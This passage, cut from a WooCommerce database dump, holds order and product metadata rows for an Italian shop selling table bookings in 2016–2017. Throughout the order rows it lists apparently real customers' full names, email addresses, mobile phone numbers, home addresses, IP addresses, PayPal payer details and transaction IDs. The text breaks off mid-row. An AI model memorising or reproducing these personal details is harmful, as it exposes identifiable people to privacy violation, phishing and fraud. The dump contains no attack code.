attached','[]'),(1782,254,'Payer PayPal address','micaela82@alice.it'),(1783,254,'Payer first name','Luca'),(1784,254,'Payer last name','Tonelli'),(1785,254,'Payment type','instant'),(1786,254,'_download_permissions_granted','1'),(1787,254,'_recorded_sales','yes'),(1788,254,'_paid_date','2016-12-17 00:15:27'),(1789,254,'_transaction_id','74V61037T6876250J'),(1790,254,'_order_stock_reduced','1'),(1791,254,'PayPal Transaction Fee','4.43'),(1792,255,'_order_key','wc_order_58559ba8b2be3'),(1793,255,'_order_currency','EUR'),(1794,255,'_prices_include_tax','no'),(1795,255,'_customer_ip_address','5.90.54.131'),(1796,255,'_customer_user_agent','Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(1797,255,'_customer_user','0'),(1798,255,'_created_via','checkout'),(1799,255,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1800,255,'_order_version','2.6.9'),(1801,255,'_billing_first_name','Leonardo'),(1802,255,'_billing_last_name','Matricviani'),(1803,255,'_billing_email','leomatrix@virgilio.it'),(1804,255,'_billing_phone','3493133582'),(1805,255,'_billing_address_1','Via San Mauro 911 Cesena'),(1806,255,'_billing_city','Cesena'),(1807,255,'_shipping_first_name','Leonardo'),(1808,255,'_shipping_last_name','Matricviani'),(1809,255,'_shipping_company',''),(1810,255,'_shipping_country',''),(1811,255,'_shipping_address_1','Via San Mauro 911 Cesena'),(1812,255,'_shipping_address_2',''),(1813,255,'_shipping_city','Cesena'),(1814,255,'_shipping_state',''),(1815,255,'_shipping_postcode',''),(1816,255,'_payment_method','paypal'),(1817,255,'_payment_method_title','PayPal'),(1818,255,'_order_shipping',''),(1819,255,'_cart_discount','0'),(1820,255,'_cart_discount_tax','0'),(1821,255,'_order_tax','0'),(1822,255,'_order_shipping_tax','0'),(1823,255,'_order_total','60.00'),(1824,255,'Numero Persone Adulte','2'),(1825,255,'Numero bambini fino a 6 anni','0'),(1826,255,'Numero ragazzi fino a 13 anni','0'),(1827,255,'Files attached','[]'),(1828,255,'Payer PayPal address','leomatrix@virgilio.it'),(1829,255,'Payer first name','leonardo'),(1830,255,'Payer last name','matricciani'),(1831,255,'Payment type','instant'),(1832,255,'_download_permissions_granted','1'),(1833,255,'_recorded_sales','yes'),(1834,255,'_paid_date','2016-12-17 21:13:18'),(1835,255,'_transaction_id','48L91161FF4114731'),(1836,255,'_order_stock_reduced','1'),(1837,255,'PayPal Transaction Fee','2.39'),(1838,256,'_order_key','wc_order_58591be84c5d2'),(1839,256,'_order_currency','EUR'),(1840,256,'_prices_include_tax','no'),(1841,256,'_customer_ip_address','88.147.105.246'),(1842,256,'_customer_user_agent','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'),(1843,256,'_customer_user','0'),(1844,256,'_created_via','checkout'),(1845,256,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1846,256,'_order_version','2.6.9'),(1847,256,'_billing_first_name','EVA'),(1848,256,'_billing_last_name','BALLOTTA'),(1849,256,'_billing_email','evaballotta@me.com'),(1850,256,'_billing_phone','3401517369'),(1851,256,'_billing_address_1',''),(1852,256,'_billing_city',''),(1853,256,'_shipping_first_name','EVA'),(1854,256,'_shipping_last_name','BALLOTTA'),(1855,256,'_shipping_company',''),(1856,256,'_shipping_country',''),(1857,256,'_shipping_address_1',''),(1858,256,'_shipping_address_2',''),(1859,256,'_shipping_city',''),(1860,256,'_shipping_state',''),(1861,256,'_shipping_postcode',''),(1862,256,'_payment_method','paypal'),(1863,256,'_payment_method_title','PayPal'),(1864,256,'_order_shipping',''),(1865,256,'_cart_discount','0'),(1866,256,'_cart_discount_tax','0'),(1867,256,'_order_tax','0'),(1868,256,'_order_shipping_tax','0'),(1869,256,'_order_total','60.00'),(1870,256,'Numero Persone Adulte','2'),(1871,256,'Numero bambini fino a 6 anni',''),(1872,256,'Numero ragazzi fino a 13 anni',''),(1873,256,'Files attached','[]'),(1874,257,'_order_key','wc_order_585a6c35ec500'),(1875,257,'_order_currency','EUR'),(1876,257,'_prices_include_tax','no'),(1877,257,'_customer_ip_address','151.19.50.188'),(1878,257,'_customer_user_agent','Mozilla/5.0 (Linux; Android 5.1.1; SM-J500FN Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36'),(1879,257,'_customer_user','0'),(1880,257,'_created_via','checkout'),(1881,257,'_cart_hash','c8e6f61ba11a5a894311ac70842e4697'),(1882,257,'_order_version','2.6.9'),(1883,257,'_billing_first_name','Chiara'),(1884,257,'_billing_last_name','Taddei'),(1885,257,'_billing_email','chiatadd@gmail.com'),(1886,257,'_billing_phone','3389063307'),(1887,257,'_billing_address_1','Via G. Dalla Chiesa 52'),(1888,257,'_billing_city','Curtatone'),(1889,257,'_shipping_first_name','Chiara'),(1890,257,'_shipping_last_name','Taddei'),(1891,257,'_shipping_company',''),(1892,257,'_shipping_country',''),(1893,257,'_shipping_address_1','Via G. Dalla Chiesa 52'),(1894,257,'_shipping_address_2',''),(1895,257,'_shipping_city','Curtatone'),(1896,257,'_shipping_state',''),(1897,257,'_shipping_postcode',''),(1898,257,'_payment_method','paypal'),(1899,257,'_payment_method_title','PayPal'),(1900,257,'_order_shipping',''),(1901,257,'_cart_discount','0'),(1902,257,'_cart_discount_tax','0'),(1903,257,'_order_tax','0'),(1904,257,'_order_shipping_tax','0'),(1905,257,'_order_total','150.00'),(1906,257,'Numero Persone Adulte','5'),(1907,257,'Numero bambini fino a 6 anni',''),(1908,257,'Numero ragazzi fino a 13 anni',''),(1909,257,'Files attached','[]'),(1910,257,'Payer PayPal address','chiatadd@gmail.com'),(1911,257,'Payer first name','Chiara'),(1912,257,'Payer last name','Taddei'),(1913,257,'Payment type','instant'),(1914,257,'_download_permissions_granted','1'),(1915,257,'_recorded_sales','yes'),(1916,257,'_paid_date','2016-12-21 12:52:39'),(1917,257,'_transaction_id','9F201230UA507893V'),(1918,257,'_order_stock_reduced','1'),(1919,257,'PayPal Transaction Fee','5.45'),(1920,258,'_order_key','wc_order_585ad3312bd07'),(1921,258,'_order_currency','EUR'),(1922,258,'_prices_include_tax','no'),(1923,258,'_customer_ip_address','5.170.80.232'),(1924,258,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 10_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/19.0.133715217 Mobile/14A456 Safari/600.1.4'),(1925,258,'_customer_user','0'),(1926,258,'_created_via','checkout'),(1927,258,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1928,258,'_order_version','2.6.9'),(1929,258,'_billing_first_name','Fernanda'),(1930,258,'_billing_last_name','Belledi'),(1931,258,'_billing_email','Ferny.belle@gmail.com'),(1932,258,'_billing_phone','3335707346'),(1933,258,'_billing_address_1','Via gruppini 28'),(1934,258,'_billing_city','Sorbolo'),(1935,258,'_shipping_first_name','Fernanda'),(1936,258,'_shipping_last_name','Belledi'),(1937,258,'_shipping_company',''),(1938,258,'_shipping_country',''),(1939,258,'_shipping_address_1','Via gruppini 28'),(1940,258,'_shipping_address_2',''),(1941,258,'_shipping_city','Sorbolo'),(1942,258,'_shipping_state',''),(1943,258,'_shipping_postcode',''),(1944,258,'_payment_method','paypal'),(1945,258,'_payment_method_title','PayPal'),(1946,258,'_order_shipping',''),(1947,258,'_cart_discount','0'),(1948,258,'_cart_discount_tax','0'),(1949,258,'_order_tax','0'),(1950,258,'_order_shipping_tax','0'),(1951,258,'_order_total','60.00'),(1952,258,'Numero Persone Adulte','2'),(1953,258,'Numero bambini fino a 6 anni',''),(1954,258,'Numero ragazzi fino a 13 anni',''),(1955,258,'Files attached','[]'),(1956,259,'_order_key','wc_order_585af464336d9'),(1957,259,'_order_currency','EUR'),(1958,259,'_prices_include_tax','no'),(1959,259,'_customer_ip_address','5.170.73.74'),(1960,259,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B466 Safari/600.1.4'),(1961,259,'_customer_user','0'),(1962,259,'_created_via','checkout'),(1963,259,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1964,259,'_order_version','2.6.9'),(1965,259,'_billing_first_name','Eva'),(1966,259,'_billing_last_name','Ballotta'),(1967,259,'_billing_email','Evaballotta@me.com'),(1968,259,'_billing_phone','3401517369'),(1969,259,'_billing_address_1',''),(1970,259,'_billing_city',''),(1971,259,'_shipping_first_name','Eva'),(1972,259,'_shipping_last_name','Ballotta'),(1973,259,'_shipping_company',''),(1974,259,'_shipping_country',''),(1975,259,'_shipping_address_1',''),(1976,259,'_shipping_address_2',''),(1977,259,'_shipping_city',''),(1978,259,'_shipping_state',''),(1979,259,'_shipping_postcode',''),(1980,259,'_payment_method','paypal'),(1981,259,'_payment_method_title','PayPal'),(1982,259,'_order_shipping',''),(1983,259,'_cart_discount','0'),(1984,259,'_cart_discount_tax','0'),(1985,259,'_order_tax','0'),(1986,259,'_order_shipping_tax','0'),(1987,259,'_order_total','60.00'),(1988,259,'Numero Persone Adulte','2'),(1989,259,'Numero bambini fino a 6 anni',''),(1990,259,'Numero ragazzi fino a 13 anni',''),(1991,259,'Files attached','[]'),(1992,259,'Payer PayPal address','Evaballotta@me.com'),(1993,259,'Payer first name','Maria rosa'),(1994,259,'Payer last name','lusetti'),(1995,259,'Payment type','instant'),(1996,259,'_download_permissions_granted','1'),(1997,259,'_recorded_sales','yes'),(1998,259,'_paid_date','2016-12-21 22:38:29'),(1999,259,'_transaction_id','05R8689748892293J'),(2000,259,'_order_stock_reduced','1'),(2001,259,'PayPal Transaction Fee','2.39'),(2002,261,'_order_key','wc_order_585d1818cb7f0'),(2003,261,'_order_currency','EUR'),(2004,261,'_prices_include_tax','no'),(2005,261,'_customer_ip_address','82.61.65.91'),(2006,261,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12'),(2007,261,'_customer_user','0'),(2008,261,'_created_via','checkout'),(2009,261,'_cart_hash','d68cbe66896477692254f9c7310567e4'),(2010,261,'_order_version','2.6.9'),(2011,261,'_billing_first_name','Alberto'),(2012,261,'_billing_last_name','Gaia'),(2013,261,'_billing_email','albertogaia@alice.it'),(2014,261,'_billing_phone','3348190301'),(2015,261,'_billing_address_1','via Garibaldi 258'),(2016,261,'_billing_city','47853 Coriano'),(2017,261,'_shipping_first_name','Alberto'),(2018,261,'_shipping_last_name','Gaia'),(2019,261,'_shipping_company',''),(2020,261,'_shipping_country',''),(2021,261,'_shipping_address_1','via Garibaldi 258'),(2022,261,'_shipping_address_2',''),(2023,261,'_shipping_city','47853 Coriano'),(2024,261,'_shipping_state',''),(2025,261,'_shipping_postcode',''),(2026,261,'_payment_method','paypal'),(2027,261,'_payment_method_title','PayPal'),(2028,261,'_order_shipping',''),(2029,261,'_cart_discount','0'),(2030,261,'_cart_discount_tax','0'),(2031,261,'_order_tax','0'),(2032,261,'_order_shipping_tax','0'),(2033,261,'_order_total','120.00'),(2034,261,'Numero Persone Adulte','4'),(2035,261,'Numero bambini fino a 6 anni',''),(2036,261,'Numero ragazzi fino a 13 anni',''),(2037,261,'Files attached','[]'),(2038,261,'Payer PayPal address','albertogaia@alice.it'),(2039,261,'Payer first name','Alberto'),(2040,261,'Payer last name','Gaia'),(2041,261,'Payment type','instant'),(2042,261,'_download_permissions_granted','1'),(2043,261,'_recorded_sales','yes'),(2044,261,'_paid_date','2016-12-23 13:28:18'),(2045,261,'_transaction_id','32J967119B251100G'),(2046,261,'_order_stock_reduced','1'),(2047,261,'PayPal Transaction Fee','4.43'),(2072,264,'_wp_attached_file','2016/12/ptg-coupon-code-photo.jpg'),(2073,264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:361;s:6:\"height\";i:333;s:4:\"file\";s:33:\"2016/12/ptg-coupon-code-photo.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-300x333.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-300x277.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-300x277.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-300x333.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-230x212.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:33:\"ptg-coupon-code-photo-350x323.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:323;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:8:\"iQoncept\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:130:\"Coupon word with dotted line around it in an envelope for you to cut out and save at a sale or discount clearance event of a store\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:54:\"Coupon Envelope Cut Out Dotted Line Special Offer Sale\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:61:{i:0;s:6:\"coupon\";i:1;s:6:\"offers\";i:2;s:7:\"coupons\";i:3;s:3:\"cut\";i:4;s:7:\"cutting\";i:5;s:4:\"clip\";i:6;s:8:\"clipping\";i:7;s:3:\"out\";i:8;s:6:\"dotted\";i:9;s:4:\"line\";i:10;s:8:\"envelope\";i:11;s:7:\"thrifty\";i:12;s:5:\"cheap\";i:13;s:7:\"cheaper\";i:14;s:8:\"cheapest\";i:15;s:5:\"price\";i:16;s:4:\"cost\";i:17;s:7:\"special\";i:18;s:6:\"unique\";i:19;s:7:\"message\";i:20;s:4:\"save\";i:21;s:7:\"savings\";i:22;s:6:\"inside\";i:23;s:4:\"sale\";i:24;s:4:\"code\";i:25;s:5:\"saver\";i:26;s:7:\"bargain\";i:27;s:6:\"rebate\";i:28;s:8:\"discount\";i:29;s:5:\"offer\";i:30;s:9:\"discounts\";i:31;s:9:\"advertise\";i:32;s:13:\"advertisement\";i:33;s:3:\"buy\";i:34;s:6:\"buying\";i:35;s:5:\"buyer\";i:36;s:4:\"shop\";i:37;s:8:\"shopping\";i:38;s:7:\"shopper\";i:39;s:5:\"store\";i:40;s:9:\"marketing\";i:41;s:9:\"junk mail\";i:42;s:4:\"mail\";i:43;s:6:\"mailer\";i:44;s:4:\"deal\";i:45;s:5:\"deals\";i:46;s:5:\"value\";i:47;s:8:\"valuable\";i:48;s:9:\"important\";i:49;s:11:\"significant\";i:50;s:9:\"exclusive\";i:51;s:5:\"money\";i:52;s:4:\"word\";i:53;s:2:\"3d\";i:54;s:11:\"illustrated\";i:55;s:12:\"illustration\";i:56;s:3:\"buy\";i:57;s:6:\"buying\";i:58;s:8:\"customer\";i:59;s:9:\"customers\";i:60;s:8:\"business\";}}}'),(2102,265,'_order_key','wc_order_586649f002b8c'),(2103,265,'_order_currency','EUR'),(2104,265,'_prices_include_tax','no'),(2105,265,'_customer_ip_address','80.79.80.235'),(2106,265,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),(2107,265,'_customer_user','0'),(2108,265,'_created_via','checkout'),(2109,265,'_cart_hash','c8e6f61ba11a5a894311ac70842e4697'),(2110,265,'_order_version','2.6.11'),(2111,265,'_billing_first_name','roberto'),(2112,265,'_billing_last_name','moscariello'),(2113,265,'_billing_email','robbymosca65@gmail.com'),(2114,265,'_billing_phone','3472584213'),(2115,265,'_billing_address_1','via porrettana'),(2116,265,'_billing_city','sasso marconi'),(2117,265,'_shipping_first_name','roberto'),(2118,265,'_shipping_last_name','moscariello'),(2119,265,'_shipping_company',''),(2120,265,'_shipping_country',''),(2121,265,'_shipping_address_1','via porrettana'),(2122,265,'_shipping_address_2',''),(2123,265,'_shipping_city','sasso marconi'),(2124,265,'_shipping_state',''),(2125,265,'_shipping_postcode',''),(2126,265,'_payment_method','paypal'),(2127,265,'_payment_method_title','PayPal'),(2128,265,'_order_shipping',''),(2129,265,'_cart_discount','0'),(2130,265,'_cart_discount_tax','0'),(2131,265,'_order_tax','0'),(2132,265,'_order_shipping_tax','0'),(2133,265,'_order_total','150.00'),(2134,265,'Numero Persone Adulte','6'),(2135,265,'Numero bambini fino a 6 anni',''),(2136,265,'Numero ragazzi fino a 13 anni',''),(2137,265,'Files attached','[]'),(2138,265,'Payer PayPal address','robbymosca65@gmail.com'),(2139,265,'Payer first name','roberto'),(2140,265,'Payer last name','moscariello'),(2141,265,'Payment type','instant'),(2142,265,'_download_permissions_granted','1'),(2143,265,'_recorded_sales','yes'),(2144,265,'_paid_date','2016-12-30 13:24:09'),(2145,265,'_transaction_id','8CR3079663203442X'),(2146,265,'_order_stock_reduced','1'),(2147,265,'PayPal Transaction Fee','5.45'),(2148,266,'_order_key','wc_order_5866704e4ef2d'),(2149,266,'_order_currency','EUR'),(2150,266,'_prices_include_tax','no'),(2151,266,'_customer_ip_address','79.36.46.228'),(2152,266,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2153,266,'_customer_user','0'),(2154,266,'_created_via','checkout'),(2155,266,'_cart_hash','d68cbe66896477692254f9c7310567e4'),(2156,266,'_order_version','2.6.11'),(2157,266,'_billing_first_name','gabriele'),(2158,266,'_billing_last_name','manicardi'),(2159,266,'_billing_email','gabrielemanicardi@alice.it'),(2160,266,'_billing_phone','3462145246'),(2161,266,'_billing_address_1','strada gondar 4/a montecchio emilia'),(2162,266,'_billing_city','reggi nell\'emilia'),(2163,266,'_shipping_first_name','gabriele'),(2164,266,'_shipping_last_name','manicardi'),(2165,266,'_shipping_company',''),(2166,266,'_shipping_country',''),(2167,266,'_shipping_address_1','strada gondar 4/a montecchio emilia'),(2168,266,'_shipping_address_2',''),(2169,266,'_shipping_city','reggi nell\'emilia'),(2170,266,'_shipping_state',''),(2171,266,'_shipping_postcode',''),(2172,266,'_payment_method','paypal'),(2173,266,'_payment_method_title','PayPal'),(2174,266,'_order_shipping',''),(2175,266,'_cart_discount','0'),(2176,266,'_cart_discount_tax','0'),(2177,266,'_order_tax','0'),(2178,266,'_order_shipping_tax','0'),(2179,266,'_order_total','120.00'),(2180,266,'Numero Persone Adulte','4'),(2181,266,'Numero bambini fino a 6 anni',''),(2182,266,'Numero ragazzi fino a 13 anni',''),(2183,266,'Files attached','[]'),(2184,266,'Payer PayPal address','valeria.gasparini@tin.it'),(2185,266,'Payer first name','valeria'),(2186,266,'Payer last name','gasparini'),(2187,266,'Payment type','instant'),(2188,266,'_download_permissions_granted','1'),(2189,266,'_recorded_sales','yes'),(2190,266,'_paid_date','2016-12-30 15:55:49'),(2191,266,'_transaction_id','4L9884662V0287531'),(2192,266,'_order_stock_reduced','1'),(2193,266,'PayPal Transaction Fee','4.43'),(2194,267,'_refund_amount','120'),(2195,267,'_order_currency','EUR'),(2196,267,'_order_shipping','0'),(2197,267,'_cart_discount','0'),(2198,267,'_cart_discount_tax','0'),(2199,267,'_order_total','-120.00'),(2200,268,'_refund_amount','180'),(2201,268,'_order_currency','EUR'),(2202,268,'_order_shipping','0'),(2203,268,'_cart_discount','0'),(2204,268,'_cart_discount_tax','0'),(2205,268,'_order_total','-180.00'),(2206,269,'_refund_amount','60'),(2207,269,'_order_currency','EUR'),(2208,269,'_order_shipping','0'),(2209,269,'_cart_discount','0'),(2210,269,'_cart_discount_tax','0'),(2211,269,'_order_total','-60.00'),(2212,51,'slide_template','default'),(2213,51,'_yoast_wpseo_content_score','90'),(2214,49,'slide_template','default'),(2215,49,'_yoast_wpseo_content_score','90'),(2216,47,'slide_template','default'),(2217,47,'_yoast_wpseo_content_score','90'),(2218,108,'slide_template','default'),(2219,108,'_yoast_wpseo_content_score','90'),(2220,5,'slide_template','default'),(2221,5,'_yoast_wpseo_content_score','90'),(2222,14,'slide_template','default'),(2223,14,'_yoast_wpseo_content_score','60'),(2224,283,'_edit_lock','1490687045:1'),(2225,283,'_edit_last','1'),(2228,283,'slide_template','default'),(2229,283,'_yoast_wpseo_content_score','90'),(2230,283,'_yoast_wpseo_primary_category','1'),(2231,285,'_wp_attached_file','2017/02/sanvalentino2017.jpg'),(2232,285,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:28:\"2017/02/sanvalentino2017.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"sanvalentino2017-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"sanvalentino2017-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-830x830.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:28:\"sanvalentino2017-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2238,288,'_edit_lock','1581447268:2'),(2239,288,'_edit_last','2'),(2240,288,'_visibility','visible'),(2241,288,'_thumbnail_id','212'),(2242,288,'_downloadable','no'),(2243,288,'_virtual','no'),(2244,288,'_purchase_note',''),(2245,288,'_featured','no'),(2246,288,'_weight',''),(2247,288,'_length',''),(2248,288,'_width',''),(2249,288,'_height',''),(2250,288,'_product_attributes','a:0:{}'),(2251,288,'_regular_price','30'),(2252,288,'_sale_price',''),(2253,288,'_sale_price_dates_from',''),(2254,288,'_sale_price_dates_to',''),(2255,288,'_sold_individually','yes'),(2256,288,'_manage_stock','yes'),(2257,288,'_backorders','no'),(2258,288,'_stock','0'),(2259,288,'_stock_status','outofstock'),(2260,288,'_upsell_ids','a:0:{}'),(2261,288,'_crosssell_ids','a:0:{}'),(2262,288,'_price','30'),(2263,288,'_product_version','3.9.1'),(2264,288,'_product_image_gallery',''),(2265,288,'slide_template',''),(2266,288,'_yoast_wpseo_primary_product_cat','11'),(2267,288,'_yoast_wpseo_content_score','60'),(2268,288,'total_sales','61'),(2269,288,'_sku','sanvalentino-tavolox2'),(2270,288,'_wc_rating_count','a:0:{}'),(2271,288,'_wc_review_count','0'),(2272,288,'_wc_average_rating','0'),(2275,290,'_edit_lock','1580469659:1'),(2276,290,'_edit_last','1'),(2277,290,'_visibility','visible'),(2278,290,'_thumbnail_id','212'),(2279,290,'_downloadable','no'),(2280,290,'_virtual','no'),(2281,290,'_purchase_note',''),(2282,290,'_featured','no'),(2283,290,'_weight',''),(2284,290,'_length',''),(2285,290,'_width',''),(2286,290,'_height',''),(2287,290,'_product_attributes','a:0:{}'),(2288,290,'_regular_price','60'),(2289,290,'_sale_price',''),(2290,290,'_sale_price_dates_from',''),(2291,290,'_sale_price_dates_to',''),(2292,290,'_sold_individually','yes'),(2293,290,'_manage_stock','yes'),(2294,290,'_backorders','no'),(2295,290,'_stock','0'),(2296,290,'_stock_status','outofstock'),(2297,290,'_upsell_ids','a:0:{}'),(2298,290,'_crosssell_ids','a:0:{}'),(2299,290,'_price','60'),(2300,290,'_product_version','3.9.1'),(2301,290,'_product_image_gallery',''),(2302,290,'slide_template',''),(2303,290,'_yoast_wpseo_primary_product_cat','11'),(2304,290,'_yoast_wpseo_content_score','90'),(2305,290,'total_sales','2'),(2306,290,'_sku','sanvalentino-tavolox4'),(2307,290,'_wc_rating_count','a:0:{}'),(2308,290,'_wc_average_rating','0'),(2311,291,'_order_key','wc_order_5894ba1195b83'),(2312,291,'_order_currency','EUR'),(2313,291,'_prices_include_tax','no'),(2314,291,'_customer_ip_address','151.67.242.71'),(2315,291,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1'),(2316,291,'_customer_user','0'),(2317,291,'_created_via','checkout'),(2318,291,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2319,291,'_order_version','2.6.14'),(2320,291,'_billing_first_name','Marco'),(2321,291,'_billing_last_name','Gasperoni'),(2322,291,'_billing_email','marcogasperoni18@gmail.com'),(2323,291,'_billing_phone','3388217234'),(2324,291,'_billing_address_1','Via Lecce 26'),(2325,291,'_billing_city','Rimini'),(2326,291,'_shipping_first_name','Marco'),(2327,291,'_shipping_last_name','Gasperoni'),(2328,291,'_shipping_company',''),(2329,291,'_shipping_country',''),(2330,291,'_shipping_address_1','Via Lecce 26'),(2331,291,'_shipping_address_2',''),(2332,291,'_shipping_city','Rimini'),(2333,291,'_shipping_state',''),(2334,291,'_shipping_postcode',''),(2335,291,'_payment_method','paypal'),(2336,291,'_payment_method_title','PayPal'),(2337,291,'_order_shipping',''),(2338,291,'_cart_discount','0'),(2339,291,'_cart_discount_tax','0'),(2340,291,'_order_tax','0'),(2341,291,'_order_shipping_tax','0'),(2342,291,'_order_total','30.00'),(2343,291,'Numero Persone Adulte','2'),(2344,291,'Numero bambini fino a 6 anni',''),(2345,291,'Numero ragazzi fino a 13 anni',''),(2346,291,'Files 